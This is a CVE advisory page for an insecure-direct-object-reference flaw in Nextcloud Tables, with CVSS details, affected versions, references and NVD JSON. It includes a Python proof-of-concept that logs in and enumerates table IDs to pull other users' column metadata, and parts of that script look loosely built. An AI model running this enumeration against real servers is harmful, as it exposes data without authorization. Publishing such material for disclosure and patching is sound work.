Security Vulnerability Report
CVE-2025-66553 CVSS 4.3 MEDIUM

Published: 2025-12-05 18:15:58
Last Modified: 2025-12-09 17:03:19

Description

Nextcloud Tables allows you to create your own tables with individual columns. Prior to 0.8.7 and 0.9.4, authenticated users were able to view meta data of columns in other tables of the Tables app by modifying the numeric ID in a request. This vulnerability is fixed in 0.8.7 and 0.9.4.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:nextcloud:tables:*:*:*:*:*:nextcloud:*:* - VULNERABLE (Nextcloud Tables < 0.8.7)
cpe:2.3:a:nextcloud:tables:*:*:*:*:*:nextcloud:*:* - VULNERABLE (Nextcloud Tables < 0.9.4)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2025-66553 PoC - Nextcloud Tables Information Disclosure
# Target: Nextcloud Tables < 0.8.7 and < 0.9.4

TARGET_URL = "https://vulnerable-nextcloud.example.com"
USERNAME = "[email protected]"
PASSWORD = "password123"


def authenticate():
    """Authenticate to Nextcloud and get session cookies"""
    session = requests.Session()
    login_url = f"{TARGET_URL}/login"

    # Get CSRF token
    response = session.get(login_url)
    csrf_token = session.cookies.get('nc_token') or 'your_csrf_token'

    # Login request
    login_data = {
        'user': USERNAME,
        'password': PASSWORD,
        'requesttoken': csrf_token
    }
    response = session.post(login_url, data=login_data)
    if response.status_code == 200:
        return session
    return None


def exploit_table_columns(session, table_id):
    """Attempt to retrieve column metadata from target table"""
    columns_url = f"{TARGET_URL}/apps/tables/api/1/tables/{table_id}/columns"
    headers = {
        'OCS-APIREQUEST': 'true',
        'Content-Type': 'application/json'
    }
    response = session.get(columns_url, headers=headers)
    if response.status_code == 200:
        try:
            data = response.json()
            if data and len(data) > 0:
                print(f"[!] Disclosed columns for table ID {table_id}:")
                for col in data:
                    print(f" Column: {col.get('title')}, Type: {col.get('type')}")
                return data
        except json.JSONDecodeError:
            pass
    return None


def main():
    print("[*] CVE-2025-66553 PoC - Nextcloud Tables Information Disclosure")
    print("[*] Authenticating to Nextcloud...")
    session = authenticate()
    if not session:
        print("[-] Authentication failed")
        return
    print("[+] Authentication successful")
    print("[*] Enumerating table IDs to extract column metadata...")

    # Enumerate table IDs (typically sequential integers)
    for table_id in range(1, 100):
        columns = exploit_table_columns(session, table_id)
        if columns:
            print(f"[+] Successfully extracted metadata from table {table_id}")

    print("[*] PoC execution completed")


if __name__ == "__main__":
    main()

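References

https://github.com/nextcloud/security-advisories/security/advisories/GHSA-p53h-6294-crjw (Patch, Vendor Advisory)
https://github.com/nextcloud/tables/commit/e975f5bfedb6922f04cdd236cde4e26067fe064e (Patch)
https://github.com/nextcloud/tables/pull/1891 (Issue Tracking)
https://hackerone.com/reports/3138721 (Issue Tracking, Vendor Advisory)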

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66553", "sourceIdentifier": "[email protected]", "published": "2025-12-05T18:15:58.460", "lastModified": "2025-12-09T17:03:18.813", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nextcloud Tables allows you to create your own tables with individual columns. Prior to 0.8.7 and 0.9.4, authenticated users were able to view meta data of columns in other tables of the Tables app by modifying the numeric ID in a request. This vulnerability is fixed in 0.8.7 and 0.9.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:tables:*:*:*:*:*:nextcloud:*:*", "versionStartIncluding": "0.8.0", "versionEndExcluding": "0.8.7", "matchCriteriaId": "8F6FEA34-55C6-4BE2-9B0A-A4A7B6A9AD2C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:tables:*:*:*:*:*:nextcloud:*:*", "versionStartIncluding": "0.9.0", "versionEndExcluding": "0.9.4", "matchCriteriaId": "8E73963A-16FC-4C82-90C9-E275535CEA5B"}]}]}], "references": [{"url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-p53h-6294-crjw", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://github.com/nextcloud/tables/commit/e975f5bfedb6922f04cdd236cde4e26067fe064e", "source": "[email protected]", "tags": ["Patch"]}, {"url": 
"https://github.com/nextcloud/tables/pull/1891", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://hackerone.com/reports/3138721", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}